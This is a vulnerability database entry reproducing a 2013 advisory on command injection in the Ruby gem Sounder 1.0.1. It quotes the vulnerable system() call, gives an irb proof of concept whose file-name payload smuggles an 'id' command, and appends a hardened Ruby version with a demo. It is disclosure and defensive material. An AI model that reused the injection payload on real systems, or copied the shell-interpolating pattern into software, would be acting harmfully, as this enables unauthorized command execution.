Ruby Gem Sounder 1.0.1 Command Injection

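Vulnerability ID 1044539 Vulnerability type
Published 2013-08-28 Updated 2013-08-28
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2013080217
|Vulnerability details
Vulnerability details have not been disclosed yet
|Exploit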
Title: Command Injection in Ruby Gem Sounder 1.0.1

Date: 8/10/2013
Author: Larry W. Cashdollar @_larry0

Download: https://rubygems.org/gems/sounder
CVE: TBD
Description:

Sounder is a Ruby gem API for Mac OSX's afplay command.
It passes user-supplied data directly to the command line.
From lib/sounder/sound.rb:

   def play
     system %{/usr/bin/afplay "#{@file}" &}
   end

PoC:

irb(main):098:0> @file = "\"id;/usr/bin/id>/tmp/p;\""
=> "\"id;/usr/bin/id>/tmp/p;\""
irb(main):099:0>  system %{/bin/echo "#{@file}" }
id
sh: 1: : Permission denied
=> false
irb(main):100:0>
larry@underfl0w:/tmp$ cat /tmp/p
uid=1000(larry) gid=600(staff) groups=600(user)

Author Notified: 8/9/2013
Advisory:  http://vapid.dhs.org/advisories/sounder-ruby-gem-cmd-inj.html
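
A hardened counterpart to the `play` method quoted above, as an added example that is not code from the gem or the advisory: the program and the file name are passed as separate arguments so no shell parses the name, and only existing regular files are accepted. `/bin/echo` stands in for `/usr/bin/afplay` so it runs anywhere, and `checked_path`, `UnsafePathError` and `demo` are hypothetical names.

```ruby
require "open3"
require "tmpdir"

# Stand-in for /usr/bin/afplay so the example runs on any POSIX host (assumption).
PLAYER = "/bin/echo"

class UnsafePathError < ArgumentError; end

# Expand to an absolute path (so it can never start with "-" and be read as an
# option) and require an existing regular file.
def checked_path(file)
  path = File.expand_path(file.to_s)
  raise UnsafePathError, "not a regular file: #{path.inspect}" unless File.file?(path)
  path
end

# Hardened play: program and argument are separate list elements, so Ruby
# executes the program directly and /bin/sh never parses the file name.
# (For background playback like the original "&", pass the same two
# arguments to Process.spawn and Process.detach the returned pid.)
def play(file)
  out, status = Open3.capture2(PLAYER, checked_path(file))
  [out.chomp, status.success?]
end

# Constructed inputs: the advisory's PoC string, and a real file whose name
# carries the same kind of metacharacters plus a marker command.
def demo
  Dir.mktmpdir do |dir|
    marker = File.join(dir, "marker")
    hostile = File.join(dir, %{a";touch marker;".wav})
    File.write(hostile, "")
    rejected = begin
      play(%{"id;/usr/bin/id>/tmp/p;"})
      false
    rescue UnsafePathError
      true
    end
    out, ok = Dir.chdir(dir) { play(hostile) }
    { rejected: rejected, echoed_literal: out == hostile, ok: ok,
      marker_created: File.exist?(marker) }
  end
end

p demo if $PROGRAM_NAME == __FILE__
```

The same applies to `Kernel#system`: called with a single interpolated string it goes through the shell, called as `system(program, arg)` it does not.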